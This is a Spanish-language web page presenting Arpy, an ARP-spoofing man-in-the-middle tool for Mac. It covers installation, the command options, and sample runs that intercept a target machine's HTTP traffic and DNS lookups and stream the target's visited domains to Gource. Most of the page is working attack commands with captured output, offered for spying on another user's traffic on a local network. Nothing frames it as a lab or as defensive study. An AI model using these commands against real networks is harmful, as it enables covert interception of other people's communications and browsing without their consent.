Arpy - Herramienta Mac OSX ARP Spoof (MiTM)
Arpy es una herramienta MiTM de suplantación de ARP fácil de usar para Mac.
Proporciona 3 funciones específicas:
- Paquetes de olfateo
- Dominios visitados
- Dominios visitados con Gource
Índice de contenidos
Requisitos:
- Python 2.7
- Gource
- Scapy
- libdnet
Instalación:
- Gource:
brew install gource
- Scapy:
pip install scapy
- libdnet:
$ git clone https://github.com/dugsong/libdnet.git $ cd libdnet $ ./configure && make && make install cd python python setup.py install
Uso:
ivanvza:~/ > sudo arpy _____ | _ |___ ___ _ _ | | _| . | | | |__|__|_| | _|_ | MiTM Tool |_| |___| v3.15 -@viljoenivan Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface> ARP MiTM Tool Options: -h, --help show this help message and exit -t TARGET, --target=TARGET The Target IP -g GATEWAY, --gateway=GATEWAY The Gateway -i INTERFACE, --interface=INTERFACE Interface to use --tcp Filters out only tcp traffic --udp Filters out only udp traffic -d D_PORT, --destination_port=D_PORT Filter for a destination port -s S_PORT, --source_port=S_PORT Filter for a source port --sniff Sniff all passing data --sniff-dns Sniff only searched domains --sniff-dns-gource Output target's DNS searches in gource format -v Verbose scapy packet print
Huele el paquete:
Este es el rastreador de paquetes, le permite ver el tráfico de su objetivo.
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff _____ | _ |___ ___ _ _ | | _| . | | | |__|__|_| | _|_ | MiTM Tool |_| |___| v3.15 -@viljoenivan [Info] Starting Sniffer... [Info] Enabling IP Forwarding... [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3)) [Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90 GET / HTTP/1.1 User-Agent: curl/7.37.1 Host: ivanvza.ninja Accept: */* [Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3 HTTP/1.1 200 OK Vary: Accept-Encoding Content-Type: text/html Accept-Ranges: bytes ETag: "2719538271" Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT Content-Length: 3213 Date: Fri, 29 May 2015 20:15:06 GMT Server: Microsoft IIS <html> <title>><></title> <body> <pre style="line-height: 1.25; white-space: pre;"> SORRY / / This page does / ] not exist yet. [ ,'| ] [ / | ]___ ___[ ,' | ] ] /[ [ |: | ] ] / [ [ |: | ] ] ] [ [ [ |: | ] ] ]__ __[ [ [ |: | ] ] ] ] _ /[ [ [ [ |: | ] ] ] ] (#) [ [ [ [ :====' ] ] ]_].nHn.[_[ [ [ ] ] ] HHHHH. [ [ [ ] ] / `HH("N [ [ ]__]/ HHH " [__[ ] NNN [ ] N/" [ ] N H [ / N / q, / </pre> <h3 id="list"><h3> </body> <script> // NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23 var RTCPeerConnection = /*window.RTCPeerConnection ||
Sniff de DNS:
Esta función le permite ver los nombres de dominio que su objetivo está solicitando actualmente.
ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns _____ | _ |___ ___ _ _ | | _| . | | | |__|__|_| | _|_ | MiTM Tool |_| |___| - @viljoenivan [Info] Starting DNS Sniffer... [Info] Enabling IP Forwarding... [Info] Done... Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com. Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com. Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com. Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com. Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com. Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com. Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com. Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com. Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com. Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
Sniff de DNS con Gource:
Esta función es más o menos la misma que la anterior, sin embargo, proporciona la funcionalidad de pasar por Gource para obtener una transmisión en vivo de lo que está viendo su objetivo.
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource [INFO] For a live gource feed run this command in parallel with this one: tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 - [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)
Deja una respuesta
Contenido relacionado